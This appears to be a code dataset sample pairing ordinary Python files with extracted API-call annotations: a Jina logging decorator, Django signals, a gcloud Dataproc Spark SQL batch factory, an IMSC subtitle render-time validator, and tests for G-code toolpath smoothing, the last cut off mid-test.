>>> my_logger = JinaLogger('MyExecLogger')
>>>
>>> class MyExec(Executor):
>>> @requests
>>> @add_request_logger(my_logger)
>>> def index(self, docs, parameters, **kwargs):
>>> ...
:param logger: The logger you want to use
"""
def decorator(function):
@functools.wraps(function)
def wrapper(self, docs, parameters, **kwargs):
verbose_level = os.environ.get('JINA_LOG_LEVEL', None)
verbose_level = LogVerbosity.from_string(verbose_level) if verbose_level else None
if verbose_level is None or verbose_level > LogVerbosity.DEBUG:
return function(self, docs, parameters, **kwargs)
if not docs:
logger.debug('Docs is None. Nothing to monitor')
return function(self, docs, parameters, **kwargs)
logger.debug(f'📄 Received request containing {len(docs)} documents.')
logger.debug(f'📕 Received parameters dictionary: {parameters}')
if len(docs) > 0:
non_empty_fields = _get_non_empty_fields_doc_array(docs)
logger.debug(f'🏷 Non-empty fields {non_empty_fields}')
start_time = time.time()
result = function(self, docs, parameters, **kwargs)
end_time = time.time()
logger.debug(f'⏱ Elapsed time for request {end_time - start_time} seconds.')
return result
return wrapper
return decorator
| [
"os.environ.get",
"jina.enums.LogVerbosity.from_string",
"functools.wraps",
"time.time"
] | [((1100, 1125), 'functools.wraps', 'functools.wraps', (['function'], {}), '(function)\n', (1115, 1125), False, 'import functools\n'), ((1209, 1247), 'os.environ.get', 'os.environ.get', (['"""JINA_LOG_LEVEL"""', 'None'], {}), "('JINA_LOG_LEVEL', None)\n", (1223, 1247), False, 'import os\n'), ((2002, 2013), 'time.time', 'time.time', ([], {}), '()\n', (2011, 2013), False, 'import time\n'), ((2101, 2112), 'time.time', 'time.time', ([], {}), '()\n', (2110, 2112), False, 'import time\n'), ((1276, 1315), 'jina.enums.LogVerbosity.from_string', 'LogVerbosity.from_string', (['verbose_level'], {}), '(verbose_level)\n', (1300, 1315), False, 'from jina.enums import LogVerbosity\n')] |
# PROJECT : kungfucms
# TIME : 2020/6/9 12:54
# AUTHOR : <NAME>
# EMAIL : <EMAIL>
# PHONE : 13811754531
# WECHAT : 13811754531
# https://github.com/youngershen
from django.core.signals import request_started, \
request_finished
from django.dispatch import Signal, receiver
before_sign_in = Signal(providing_args=["toppings", "size"])
after_sign_in = Signal(providing_args=["toppings", "size"])
sign_in_post_permission = Signal(providing_args=["toppings", "size"])
@receiver(request_started)
def before_request(sender, **kwargs):
pass
@receiver(request_finished)
def after_request(sender, **kwargs):
pass
| [
"django.dispatch.receiver",
"django.dispatch.Signal"
] | [((299, 342), 'django.dispatch.Signal', 'Signal', ([], {'providing_args': "['toppings', 'size']"}), "(providing_args=['toppings', 'size'])\n", (305, 342), False, 'from django.dispatch import Signal, receiver\n'), ((359, 402), 'django.dispatch.Signal', 'Signal', ([], {'providing_args': "['toppings', 'size']"}), "(providing_args=['toppings', 'size'])\n", (365, 402), False, 'from django.dispatch import Signal, receiver\n'), ((430, 473), 'django.dispatch.Signal', 'Signal', ([], {'providing_args': "['toppings', 'size']"}), "(providing_args=['toppings', 'size'])\n", (436, 473), False, 'from django.dispatch import Signal, receiver\n'), ((477, 502), 'django.dispatch.receiver', 'receiver', (['request_started'], {}), '(request_started)\n', (485, 502), False, 'from django.dispatch import Signal, receiver\n'), ((553, 579), 'django.dispatch.receiver', 'receiver', (['request_finished'], {}), '(request_finished)\n', (561, 579), False, 'from django.dispatch import Signal, receiver\n')] |
# -*- coding: utf-8 -*- #
# Copyright 2021 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Factory class for SparkSqlBatch message."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from apitools.base.py import encoding
from googlecloudsdk.command_lib.dataproc import flags
from googlecloudsdk.command_lib.dataproc import local_file_uploader
class SparkSqlBatchFactory(object):
"""Factory class for SparkSqlBatch message."""
def __init__(self, dataproc):
"""Factory class for SparkSqlBatch message.
Args:
dataproc: A Dataproc instance.
"""
self.dataproc = dataproc
def UploadLocalFilesAndGetMessage(self, args):
"""Uploads local files and creates a SparkSqlBatch message.
Uploads user local files and change the URIs to local files to uploaded
URIs.
Creates a SparkSqlBatch message.
Args:
args: Parsed arguments.
Returns:
A SparkSqlBatch message instance.
Raises:
AttributeError: Bucket is required to upload local files, but not
specified.
"""
kwargs = {}
dependencies = {}
# Upload requires a list.
dependencies['queryFileUri'] = [args.SQL_SCRIPT]
if args.jar_files:
dependencies['jarFileUris'] = args.jar_files
if args.jars:
dependencies['jarFileUris'] = args.jars
params = None
if args.script_variables:
params = args.script_variables
elif args.vars:
params = args.vars
if params:
kwargs['queryVariables'] = encoding.DictToAdditionalPropertyMessage(
params,
self.dataproc.messages.SparkSqlBatch.QueryVariablesValue,
sort_items=True)
if local_file_uploader.HasLocalFiles(dependencies):
bucket = args.deps_bucket if args.deps_bucket is not None else args.bucket
if not bucket:
raise AttributeError('--deps-bucket was not specified.')
      dependencies = local_file_uploader.Upload(bucket, dependencies)
# Move main SQL script out of the list.
dependencies['queryFileUri'] = dependencies['queryFileUri'][0]
# Merge the dictionaries first for compatibility.
kwargs.update(dependencies)
return self.dataproc.messages.SparkSqlBatch(**kwargs)
def AddArguments(parser):
flags.AddMainSqlScript(parser)
flags.AddJarFiles(parser)
flags.AddSqlScriptVariables(parser)
# Cloud Storage bucket to upload workload dependencies.
# It is required until we figure out a place to upload user files.
flags.AddBucket(parser)
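# Rough mapping (illustrative; the exact flag spellings are defined in the
# flags module): the factory above backs a command along the lines of
#   gcloud dataproc batches submit spark-sql QUERY.sql \
#       --vars=name=value --jars=gs://bucket/lib.jar --deps-bucket=gs://bucket
# where any local QUERY.sql / jar paths are uploaded to the bucket first.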
| [
"googlecloudsdk.command_lib.dataproc.flags.AddBucket",
"googlecloudsdk.command_lib.dataproc.local_file_uploader.HasLocalFiles",
"googlecloudsdk.command_lib.dataproc.flags.AddJarFiles",
"googlecloudsdk.command_lib.dataproc.flags.AddMainSqlScript",
"googlecloudsdk.command_lib.dataproc.flags.AddSqlScriptVariables",
"apitools.base.py.encoding.DictToAdditionalPropertyMessage",
"googlecloudsdk.command_lib.dataproc.local_file_uploader.Upload"
] | [((2824, 2854), 'googlecloudsdk.command_lib.dataproc.flags.AddMainSqlScript', 'flags.AddMainSqlScript', (['parser'], {}), '(parser)\n', (2846, 2854), False, 'from googlecloudsdk.command_lib.dataproc import flags\n'), ((2857, 2882), 'googlecloudsdk.command_lib.dataproc.flags.AddJarFiles', 'flags.AddJarFiles', (['parser'], {}), '(parser)\n', (2874, 2882), False, 'from googlecloudsdk.command_lib.dataproc import flags\n'), ((2885, 2920), 'googlecloudsdk.command_lib.dataproc.flags.AddSqlScriptVariables', 'flags.AddSqlScriptVariables', (['parser'], {}), '(parser)\n', (2912, 2920), False, 'from googlecloudsdk.command_lib.dataproc import flags\n'), ((3050, 3073), 'googlecloudsdk.command_lib.dataproc.flags.AddBucket', 'flags.AddBucket', (['parser'], {}), '(parser)\n', (3065, 3073), False, 'from googlecloudsdk.command_lib.dataproc import flags\n'), ((2245, 2292), 'googlecloudsdk.command_lib.dataproc.local_file_uploader.HasLocalFiles', 'local_file_uploader.HasLocalFiles', (['dependencies'], {}), '(dependencies)\n', (2278, 2292), False, 'from googlecloudsdk.command_lib.dataproc import local_file_uploader\n'), ((2082, 2210), 'apitools.base.py.encoding.DictToAdditionalPropertyMessage', 'encoding.DictToAdditionalPropertyMessage', (['params', 'self.dataproc.messages.SparkSqlBatch.QueryVariablesValue'], {'sort_items': '(True)'}), '(params, self.dataproc.messages.\n SparkSqlBatch.QueryVariablesValue, sort_items=True)\n', (2122, 2210), False, 'from apitools.base.py import encoding\n'), ((2482, 2535), 'googlecloudsdk.command_lib.dataproc.local_file_uploader.Upload', 'local_file_uploader.Upload', (['args.bucket', 'dependencies'], {}), '(args.bucket, dependencies)\n', (2508, 2535), False, 'from googlecloudsdk.command_lib.dataproc import local_file_uploader\n')] |
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# Copyright (c) 2021, Pearl TV LLC
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''Hypothetical Render Model (HRM)'''
__author__ = "<NAME> <<EMAIL>>"
import typing
from dataclasses import dataclass
from fractions import Fraction
from numbers import Number
import logging
import ttconv.isd
import ttconv.style_properties as styles
import ttconv.model
from ._gcpy_codepoints import GCPY_12
LOGGER = logging.getLogger(__name__)
_BDRAW = 12
_GCPY_BASE = 12
_GCPY_OTHER = 3
_REN_G_CJK = 0.6
_REN_G_OTHER = 1.2
_NGBS = 1
_IPD = 1
@dataclass
class ISDStatistics:
dur: Number = 0 # HRM ISD time
dur_d: Number = 0 # HRM background drawing time
nbg_total: Number = 0 # Number of backgrounds drawn
clear: bool = False # Whether the root container had to be cleared
dur_t: Number = 0 # HRM text drawing time
ngra_t: Number = 0 # Total Normalized Rendered Glyph Area
gcpy_count: Number = 0 # Total number of glyphs copied
gren_count: Number = 0 # Total number of glyphs rendered
is_empty: bool = False # Does the ISD contain any content
class EventHandler:
'''Allows a callee to inform the caller of events that occur during processing. Typically
overridden by the caller.
'''
@staticmethod
def _format_message(msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics):
return (
f"{msg} at {float(time_offset):.3f}s (doc #{doc_index})\n"
f" available time: {float(available_time):.3f}s | HRM time: {float(stats.dur):.3f}\n"
f" Glyph copy count: {stats.gcpy_count} | render count: {stats.gren_count} | Background draw count: {stats.nbg_total} | Clear: {stats.clear}\n"
)
def info(self, msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics):
LOGGER.info(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats))
def warn(self, msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics):
LOGGER.warning(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats))
def error(self, msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics):
LOGGER.error(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats))
def debug(self, msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics):
LOGGER.debug(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats))
def validate(isd_iterator: typing.Iterator[typing.Tuple[Fraction, ttconv.isd.ISD]], event_handler: typing.Type[EventHandler]=EventHandler()):
'''Determines whether the sequence of ISDs returned by `isd_iterator` conform to the IMSC HRM.
`isd_iterator` returns a sequence of tuplets `(begin, ISD)`, where `ISD` is an ISD instance whose
active interval starts at `begin` seconds and ends immediately before the `begin` value of the next
ISD. Errors, warnings and info messages are signalled through callbacks on the `event_handler`.
'''
hrm = HRM()
last_offset = 0
is_last_isd_empty = True
for doc_index, (time_offset, isd) in enumerate(isd_iterator):
if time_offset < last_offset:
raise RuntimeError("ISDs are not in order of increasing offset")
stats = hrm.next_isd(isd, doc_index, is_last_isd_empty)
avail_render_time = _IPD if doc_index == 0 else time_offset - last_offset
if stats.dur > avail_render_time:
event_handler.error("Rendering time exceeded", doc_index, time_offset, avail_render_time, stats)
if stats.ngra_t > 1:
event_handler.error("NGBS exceeded", doc_index, time_offset, avail_render_time, stats)
event_handler.debug("Processed document", doc_index, time_offset, avail_render_time, stats)
if not (stats.is_empty and is_last_isd_empty):
last_offset = time_offset
is_last_isd_empty = stats.is_empty
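# Illustrative usage sketch (not part of this module); the reader/ISD helper
# names below are indicative of ttconv's API and may need adjusting:
# >>> import xml.etree.ElementTree as et
# >>> import ttconv.imsc.reader
# >>> doc = ttconv.imsc.reader.to_model(et.parse("captions.ttml"))
# >>> validate(iter(ttconv.isd.ISD.generate_isd_sequence(doc)))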
@dataclass(frozen=True)
class _Glyph:
char: str
color : styles.ColorType
font_family: typing.Tuple[typing.Union[str, styles.GenericFontFamilyType]]
font_size: styles.LengthType
font_style: styles.FontStyleType
font_weight: styles.FontWeightType
text_decoration: styles.TextDecorationType
text_outline: styles.TextOutlineType
text_shadow: styles.TextShadowType
background_color: styles.ColorType
class HRM:
def __init__(self):
self.back_buffer: typing.Set[_Glyph] = set()
self.isd_stats: ISDStatistics = None
def next_isd(
self,
isd: typing.Type[ttconv.isd.ISD],
index_n: int,
is_last_isd_empty: bool
) -> ISDStatistics:
self.isd_stats = ISDStatistics()
self._compute_dur_t(isd, index_n)
self._compute_dur_d(isd, index_n, is_last_isd_empty)
self.isd_stats.dur = self.isd_stats.dur_t + self.isd_stats.dur_d
return self.isd_stats
def _compute_dur_d(
self,
isd: typing.Type[ttconv.isd.ISD],
index_n: int,
is_last_isd_empty: bool
):
self.isd_stats.is_empty = True
draw_area = 0 if index_n == 0 or is_last_isd_empty else 1
self.isd_stats.clear = draw_area != 0
if isd is not None:
for region in isd.iter_regions():
if not _is_presented_region(region):
continue
self.isd_stats.is_empty = False
nbg = 0
for element in region.dfs_iterator():
# should body elements really be excluded? -> NO
# should transparent backgrounds really be counted? -> NO
# should span and br really be included -> yes for now
# should br really be included -> no
if isinstance(element, ttconv.model.Br):
continue
bg_color = element.get_style(styles.StyleProperties.BackgroundColor)
if bg_color is not None:
if bg_color.ident is not styles.ColorType.Colorimetry.RGBA8:
raise RuntimeError(f"Unsupported colorimetry system: {bg_color.ident}")
if bg_color.components[3] != 0:
nbg += 1
draw_area += _region_normalized_size(region) * nbg
self.isd_stats.nbg_total += nbg
self.isd_stats.dur_d = draw_area / _BDRAW
def _compute_dur_t(
self,
isd: typing.Type[ttconv.isd.ISD],
_index_n: int
):
front_buffer = set()
if isd is not None:
for region in isd.iter_regions():
if not _is_presented_region(region):
continue
for element in region.dfs_iterator():
if not isinstance(element, ttconv.model.Text):
continue
parent = element.parent()
nrga = _compute_nrga(element)
for char in element.get_text():
glyph = _Glyph(
char=char,
color=parent.get_style(styles.StyleProperties.Color),
font_family=parent.get_style(styles.StyleProperties.FontFamily),
font_size=parent.get_style(styles.StyleProperties.FontSize),
font_style=parent.get_style(styles.StyleProperties.FontStyle),
font_weight=parent.get_style(styles.StyleProperties.FontWeight),
text_decoration=parent.get_style(styles.StyleProperties.TextDecoration),
text_outline=parent.get_style(styles.StyleProperties.TextOutline),
text_shadow=parent.get_style(styles.StyleProperties.TextShadow),
background_color=parent.get_style(styles.StyleProperties.BackgroundColor)
)
if glyph in front_buffer:
self.isd_stats.dur_t += nrga / _compute_gcpy(char)
self.isd_stats.gcpy_count += 1
elif glyph in self.back_buffer:
self.isd_stats.dur_t += nrga / _compute_gcpy(char)
self.isd_stats.ngra_t += nrga
self.isd_stats.gcpy_count += 1
else:
self.isd_stats.dur_t += nrga / _compute_ren_g(char)
self.isd_stats.ngra_t += nrga
self.isd_stats.gren_count += 1
front_buffer.add(glyph)
self.back_buffer = front_buffer
def _compute_nrga(element: typing.Type[ttconv.model.Text]):
font_size: styles.LengthType = element.parent().get_style(styles.StyleProperties.FontSize)
if font_size.units is not styles.LengthType.Units.rh:
raise RuntimeError(f"Unsupported fontSize units: {font_size.units}")
return font_size.value * font_size.value / 10000
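# Worked example (illustrative): a glyph with fontSize="5rh" has
# NRGA = 5 * 5 / 10000 = 0.0025, i.e. 0.25% of the root container area.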
def _compute_ren_g(char: str):
if len(char) != 1:
raise ValueError("Argument must be a string of length 1")
return _REN_G_CJK if 0x4E00 <= ord(char) <= 0x9FFF else _REN_G_OTHER
def _compute_gcpy(char: str):
if len(char) != 1:
raise ValueError("Argument must be a string of length 1")
return _GCPY_BASE if ord(char) in GCPY_12 else _GCPY_OTHER
def _region_normalized_size(region: typing.Type[ttconv.isd.ISD.Region]):
region_extent: styles.ExtentType = region.get_style(styles.StyleProperties.Extent)
if region_extent.width.units is not styles.LengthType.Units.rw:
raise RuntimeError(f"Unsupported extent width units: {region_extent.width.units}")
if region_extent.height.units is not styles.LengthType.Units.rh:
raise RuntimeError(f"Unsupported extent height units: {region_extent.height.units}")
return region_extent.width.value * region_extent.height.value / 10000
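# Worked example (illustrative): a region with extent="50rw 10rh" has a
# normalized size of 50 * 10 / 10000 = 0.05 of the root container area.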
def _is_presented_region(region: typing.Type[ttconv.isd.ISD.Region]):
'''See https://www.w3.org/TR/ttml-imsc1.1/#dfn-presented-region
'''
if region.get_style(styles.StyleProperties.Opacity) == 0:
return False
if region.get_style(styles.StyleProperties.Display) is styles.DisplayType.none:
return False
if region.get_style(styles.StyleProperties.Visibility) is styles.DisplayType.none:
return False
if region.has_children():
return True
if region.get_style(styles.StyleProperties.ShowBackground) is not styles.ShowBackgroundType.always:
return False
bg_color: styles.ColorType = region.get_style(styles.StyleProperties.BackgroundColor)
if bg_color.ident is not styles.ColorType.Colorimetry.RGBA8:
raise RuntimeError(f"Unsupported colorimetry system: {bg_color.ident}")
if bg_color.components[3] == 0:
return False
return True
| [
"dataclasses.dataclass",
"logging.getLogger"
] | [((1687, 1714), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (1704, 1714), False, 'import logging\n'), ((5222, 5244), 'dataclasses.dataclass', 'dataclass', ([], {'frozen': '(True)'}), '(frozen=True)\n', (5231, 5244), False, 'from dataclasses import dataclass\n')] |
import os
from vibration_compensation import read_gcode, Data
import pytest
from numpy.testing import *
import numpy as np
import scipy as sp
import vibration_compensation.bokeh_imports as plt
@pytest.fixture(scope="module")
def figures():
path, filename = os.path.split(os.path.realpath(__file__))
path = os.path.join(path, "output")
os.makedirs(path, exist_ok=True)
plt.output_file(os.path.join(path, os.path.splitext(filename)[0] + ".html"))
ret = []
yield ret
plt.save(ret)
def generate_curves(gcode, maximum_error):
data = read_gcode(gcode, maximum_error)
return data
@pytest.fixture(scope="function")
def plotter(figures, request):
def plot(data: Data):
p = plt.Figure(
plot_width=1000,
plot_height=1000,
x_range=(-250, 250),
y_range=(-250, 250),
match_aspect=True,
lod_threshold=None,
title=request.node.name
)
p.segment(
x0=data.start_xy[:, 0],
x1=data.end_xy[:, 0],
y0=data.start_xy[:, 1],
y1=data.end_xy[:, 1],
line_width=1,
line_color="red",
line_dash="dotted"
)
ts = data.smoothed_toolpath.fixed_curvature_speeds(0, data.smoothed_toolpath.start_xy.shape[0], 0.1)
points = data.smoothed_toolpath(ts)
p.line(
points[:,0],
points[:,1],
line_width=2,
line_color="blue",
line_dash="solid"
)
p.circle(
points[:,0],
points[:,1],
size=4,
fill_color="white"
)
figures.append(p)
return plot
def point_on_line(linea, lineb, point):
return np.linalg.norm(linea - point) + np.linalg.norm(lineb - point)\
- np.linalg.norm(linea - lineb)
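# point_on_line() is ~0 exactly when `point` lies on the segment between
# `linea` and `lineb` (the equality case of the triangle inequality);
# point_on_middle_of_line() below returns the distance to the midpoint.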
def point_on_middle_of_line(linea, lineb, point):
mid = (lineb - linea) * 0.5 + linea
return np.linalg.norm(point - mid)
class SegmentChecker(object):
def __init__(self,data, l, s, start, end, corner):
self.data = data
self.s = s
self.start = start
self.end = end
self.start_point = data.start_xy[l]
self.end_point = data.end_xy[l]
if l != data.start_xy.shape[0] - 1:
self.next_start_point = data.start_xy[l+1]
self.next_end_point = data.end_xy[l+1]
self.spline = data.smoothed_toolpath
if corner:
self.spline_start = data.smoothed_toolpath.segment_start[s]
self.spline_mid = l + 1.0
self.spline_end = data.smoothed_toolpath.segment_end[s]
else:
self.spline_start = data.smoothed_toolpath.segment_start[s]
self.spline_end = data.smoothed_toolpath.segment_end[s]
self.spline_mid = (self.spline_start + self.spline_end) / 2.0
xy_lengths = np.linalg.norm(data.end_xy - data.start_xy, axis=1)
self.start_line_dist = np.sum(xy_lengths[:l])
self.line_length = xy_lengths[l]
if l < data.start_xy.shape[0] - 1:
self.start_next_line_dist = self.start_line_dist + self.line_length
self.next_line_length = xy_lengths[l+1]
def check_distance(self, spline, line):
msg = "The spline start distance does not match"
if line <= 1.0:
line_dist = self.start_line_dist + self.line_length * line
else:
line_dist = self.start_next_line_dist + self.next_line_length * (line-1.0)
assert self.spline.distance(spline) <= line_dist and \
self.spline.distance(spline) == pytest.approx(line_dist, abs=0.1), \
msg
def check_start_point_start(self):
msg = "The start point of the spline segment does not match the line start point"
assert_array_almost_equal(self.spline(self.spline_start), self.start_point,
err_msg=msg)
self.check_distance(self.spline_start, 0)
def check_start_point_on(self):
msg = "The start point of the spline segment is not on the line"
assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_start)) == \
pytest.approx(0, abs=1e-12), msg
def check_line_start_point_middle(self):
msg = "The start point of the spline segment is not on the middle of the line"
assert point_on_middle_of_line(self.start_point, self.end_point,
self.spline(self.spline_start)) == pytest.approx(0, abs=1e-3), msg
self.check_distance(self.spline_start, 0.5)
def check_line_start_point_end(self):
msg = "The start point of the spline segment is not on the end of the line"
assert_array_almost_equal(self.spline(self.spline_start), self.end_point, err_msg=msg)
self.check_distance(self.spline_start, 1.0)
def check_point_on_middle_of_line(self):
msg = "The middle point of the spline segment is not on the middle of the line"
assert point_on_middle_of_line(self.start_point, self.end_point,
self.spline(self.spline_mid)) == pytest.approx(0, abs=1e-12), msg
self.check_distance(self.spline_mid, 0.5)
def check_point_on_line(self):
msg = "The middle point of the spline segment is not on the line"
assert point_on_line(self.start_point, self.end_point,
self.spline(self.spline_mid)) == pytest.approx(0, abs=1e-12), msg
def check_end_point_end(self):
msg = "The end point of the spline segment does not match the line end point"
        assert_array_almost_equal(self.spline(self.spline_end), self.end_point, err_msg=msg)
self.check_distance(self.spline_end, 1.0)
end_error_segment = "The end point of the spline segment is not on the line"
def check_end_point_on(self):
assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_end)) == \
pytest.approx(0, abs=1e-12), SegmentChecker.end_error_segment
def check_corner_end_point_on(self):
assert point_on_line(self.next_start_point, self.next_end_point,
self.spline(self.spline_end)) == pytest.approx(0, abs=1e-12),\
SegmentChecker.end_error_segment
end_error_segment_middle = "The end point of the spline segment is not on the middle of the line"
def check_end_point_middle(self):
assert point_on_middle_of_line(self.start_point, self.end_point,
self.spline(self.spline_end)) == pytest.approx(0, abs=1e-3),\
SegmentChecker.end_error_segment_middle
self.check_distance(self.spline_end, 0.5)
def check_corner_end_point_middle(self):
assert point_on_middle_of_line(self.next_start_point, self.next_end_point,
self.spline(self.spline_end)) == pytest.approx(0, abs=1e-3),\
SegmentChecker.end_error_segment_middle
self.check_distance(self.spline_end, 1.5)
def check_continuity(self):
msg = "There's a discontinuity at the end of the spline segment"
if self.s > 0:
prev_end = self.data.smoothed_toolpath.segment_end[self.s-1]
assert prev_end == self.spline_start, \
"The previous segment does not end where the current one starts"
assert_array_almost_equal(self.spline(self.spline_start-1e-12), self.spline(self.spline_start),
err_msg=msg)
assert self.spline.distance(self.spline_start-1e-12) <=\
self.spline.distance(self.spline_start) and \
self.spline.distance(self.spline_start-1e-12) == \
pytest.approx(self.spline.distance(self.spline_start), abs=0.001), \
"The previous segment end distance and the current segment start do not match up"
def check_corner_spline_order(self):
assert self.spline_end > self.spline_mid, \
"The endpoint of the corner spline is before the line segment end"
corner_error = "The closest point of the corner is not close enough"
def check_corner_middle_normal(self):
assert np.linalg.norm(self.end_point - self.spline(self.spline_mid)) <= 0.01,\
SegmentChecker.corner_error
self.check_distance(self.spline_mid, 1.0)
def check_corner_middle_short(self):
assert np.linalg.norm(self.end_point - self.spline(self.spline_mid)) ==\
pytest.approx(0.01, abs=1e-12), \
SegmentChecker.corner_error
self.check_distance(self.spline_mid, 1.0)
def straight_segment(data, l, s, start, end):
checker = SegmentChecker(data, l, s, start, end, False)
if start == "start":
checker.check_start_point_start()
elif start == "on":
checker.check_start_point_on()
elif start == "middle":
checker.check_line_start_point_middle()
elif start == "end":
checker.check_line_start_point_end()
else:
assert False, "Invalid start type"
if start == "start" and end == "end":
checker.check_point_on_middle_of_line()
else:
checker.check_point_on_line()
if end == "end":
checker.check_end_point_end()
elif end == "on":
checker.check_end_point_on()
elif end == "middle":
checker.check_end_point_middle()
else:
assert False, "Invalid end type"
checker.check_continuity()
def corner_segment(data, l, s, start, end):
checker = SegmentChecker(data, l, s, start, end, True)
checker.check_corner_spline_order()
if start == "on":
checker.check_start_point_on()
elif start == "middle":
checker.check_line_start_point_middle()
else:
assert False, "Invalid start type"
if start == "middle" or end == "middle":
checker.check_corner_middle_normal()
else:
checker.check_corner_middle_short()
if end == "on":
checker.check_corner_end_point_on()
elif end == "middle":
checker.check_corner_end_point_middle()
else:
assert False, "Invalid end type"
checker.check_continuity()
def check_distances(data):
t = data.smoothed_toolpath.fixed_distances(0, data.smoothed_toolpath.total_distance(), 10)
assert_array_almost_equal(data.smoothed_toolpath.distance(t),
np.linspace(0, data.smoothed_toolpath.total_distance(), 10))
def test_straight_line(plotter):
data = generate_curves([
"G1 X100 Y200"
], maximum_error=0.01)
assert data.smoothed_toolpath.segment_start.shape[0] == 1
straight_segment(data, l=0, s=0, start="start", end="end")
assert np.sum(data.smoothed_toolpath.segment_lengths) ==\
pytest.approx(np.linalg.norm([100, 200]))
check_distances(data)
plotter(data)
def test_two_straight_lines(plotter):
data = generate_curves([
"G1 X50 Y50",
"G1 X100 Y100"
], maximum_error=0.01)
assert data.smoothed_toolpath.segment_start.shape[0] == 2
straight_segment(data, l=0, s=0, start="start", end="end")
straight_segment(data, l=1, s=1, start="start", end="end")
assert np.sum(data.smoothed_toolpath.segment_lengths) == \
pytest.approx(
np.linalg.norm([50, 50]) + np.linalg.norm([50, 50])
)
check_distances(data)
plotter(data)
def test_90_corner(plotter):
data = generate_curves([
"G1 X100 Y0",
"G1 X100 Y100"
], maximum_error=0.01)
assert data.smoothed_toolpath.segment_start.shape[0] == 3
straight_segment(data, l=0, s=0, start="start", end="on")
corner_segment(data, l=0, s=1, start="on", end="on")
straight_segment(data, l=1, s=2, start="on", end="end")
assert np.sum(data.smoothed_toolpath.segment_lengths) < 200.0
assert np.sum(data.smoothed_toolpath.segment_lengths) == pytest.approx(200, abs=0.1)
check_distances(data)
plotter(data)
def test_45_corner(plotter):
data = generate_curves([
"G1 X100 Y0",
"G1 X0 Y100"
], maximum_error=0.01)
assert data.smoothed_toolpath.segment_start.shape[0] == 3
straight_segment(data, l=0, s=0, start="start", end="on")
corner_segment(data, l=0, s=1, start="on", end="on")
straight_segment(data, l=1, s=2, start="on", end="end")
assert np.sum(data.smoothed_toolpath.segment_lengths) < 100 + np.linalg.norm([100, 100])
assert np.sum(data.smoothed_toolpath.segment_lengths) == \
pytest.approx(100 + np.linalg.norm([100, 100]), abs=0.1)
check_distances(data)
plotter(data)
def test_very_acute_corner(plotter):
data = generate_curves([
"G1 X100 Y0",
"G1 X0 Y1"
], maximum_error=0.01)
assert data.smoothed_toolpath.segment_start.shape[0] == 3
straight_segment(data, l=0, s=0, start="start", end="on")
corner_segment(data, l=0, s=1, start="on", end="on")
straight_segment(data, l=1, s=2, start="on", end="end")
assert np.sum(data.smoothed_toolpath.segment_lengths) < 100 + np.linalg.norm([100, 1])
assert np.sum(data.smoothed_toolpath.segment_lengths) == \
pytest.approx(100 + np.linalg.norm([100, 1]), abs=0.1)
check_distances(data)
plotter(data)
def test_135_corner(plotter):
data = generate_curves([
"G1 X100 Y0",
"G1 X200 Y100"
], maximum_error=0.01)
assert data.smoothed_toolpath.segment_start.shape[0] == 3
straight_segment(data, l=0, s=0, start="start", end="on")
corner_segment(data, l=0, s=1, start="on", end="on")
straight_segment(data, l=1, s=2, start="on", end="end")
assert np.sum(data.smoothed_toolpath.segment_lengths) < 100 + np.linalg.norm([100, 100])
assert np.sum(data.smoothed_toolpath.segment_lengths) == \
pytest.approx(100 + np.linalg.norm([100, 100]), abs=0.1)
check_distances(data)
plotter(data)
def test_135_corner_counter_clockwise(plotter):
data = generate_curves([
"G1 X-100 Y-100",
"G1 X-200 Y-100"
], maximum_error=0.01)
assert data.smoothed_toolpath.segment_start.shape[0] == 3
straight_segment(data, l=0, s=0, start="start", end="on")
corner_segment(data, l=0, s=1, start="on", end="on")
straight_segment(data, l=1, s=2, start="on", end="end")
assert np.sum(data.smoothed_toolpath.segment_lengths) < 100 + np.linalg.norm([100, 100])
assert np.sum(data.smoothed_toolpath.segment_lengths) == \
pytest.approx(100 + np.linalg.norm([100, 100]), abs=0.1)
check_distances(data)
plotter(data)
def test_very_obtuse_corner(plotter):
data = generate_curves([
"G1 X100 Y0",
"G1 X200 Y1"
], maximum_error=0.01)
